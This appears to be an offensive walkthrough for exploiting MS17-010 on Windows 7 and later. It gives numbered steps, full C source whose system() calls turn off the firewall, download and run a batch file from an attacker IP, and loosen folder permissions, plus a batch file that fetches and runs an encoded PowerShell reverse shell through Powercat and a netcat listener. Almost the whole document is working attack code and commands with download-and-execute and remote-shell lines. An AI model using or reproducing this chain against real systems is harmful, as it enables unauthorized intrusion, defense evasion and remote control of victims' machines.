This disables the firewall, evades AV, and can work even without PowerShell. Windows 7+.

  1. Go to your /tmp folder and set up an HTTP listener: python3 -m http.server 80
  2. Create the following file testexe.c in /tmp (Change IP)
  3. Compile it to something.exe: i686-w64-mingw32-gcc testexe.c -o /tmp/something.exe
  4. Generate a payload using Powercat (replace LHOST and LPORT with attacker IP): pwsh -c "iex (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c IP -p 25 -e cmd.exe -ge" > /tmp/shell-25.txt
  5. Create the file /tmp/backup.bat in /tmp as below. (Change IP)
  6. Set up a listener on port 25 to catch Powercat: rlwrap nc -nlvp 25
  7. Download the files mysmb.py and send_and_execute.py from here: https://github.com/helviojunior/MS17-010 and put them in the same folder.
  8. Run the python2 script send_and_execute.py using pipenv shell: python send_and_execute.py targetIP /tmp/something.exe
  9. Wait patiently!
testexe.c (REMEMBER IP PORT)
#include <stdlib.h>
/*
 * Entry point: a straight-line run of five commands, each handed to the
 * shell via system(). The steps are order-dependent (firewall off, fetch,
 * execute, then loosen ACLs), so the sequence is documented rather than
 * restructured. Each return value is assigned to i but never read, so a
 * failed step does not stop the ones after it.
 *
 * From the defender's side every step leaves a concrete artifact on the
 * host: a firewall-state change, a new file under C:\Windows\Tasks, a
 * background batch process, and a recursive ACL grant to Everyone on the
 * contents of that folder.
 */
int main ()
{
int i;
/* Turn off Windows Firewall for all profiles. */
i = system ("netsh advfirewall set allprofiles state off");
/* Fetch backup.bat with certutil -- the path that needs no PowerShell. */
i = system ("certutil.exe -urlcache -split -f \"http://192.168.119.213:80/backup.bat\" C:\\Windows\\Tasks\\backup.bat");
/* Fetch the same file again with PowerShell, to the same destination. */
i = system ("powershell.exe -c (New-Object System.Net.Webclient).DownloadFile('http://192.168.119.213:80/backup.bat','C:\\Windows\\Tasks\\backup.bat')");
/* Run the downloaded batch file in the background (START /B: no new window). */
i = system ("START /B C:\\Windows\\Tasks\\backup.bat");
/* Grant Everyone full control, recursively, over everything under C:\Windows\Tasks. */
i = system ("icacls C:\\Windows\\Tasks\\* /c /t /grant everyone:f");
return 0;
}
backup.bat (REMEMBER IP)
REM Fetch the Powercat-generated payload (shell-25.txt from step 4) over HTTP from IP:80
REM and run it as a PowerShell encoded command (-E) in the background (START /B).
REM Observable on the host: the outbound HTTP request to IP:80 and a child powershell
REM process whose command line is an encoded command.
START /B powershell -c $code=(New-Object System.Net.Webclient).DownloadString('http://IP:80/shell-25.txt');iex 'powershell -E $code'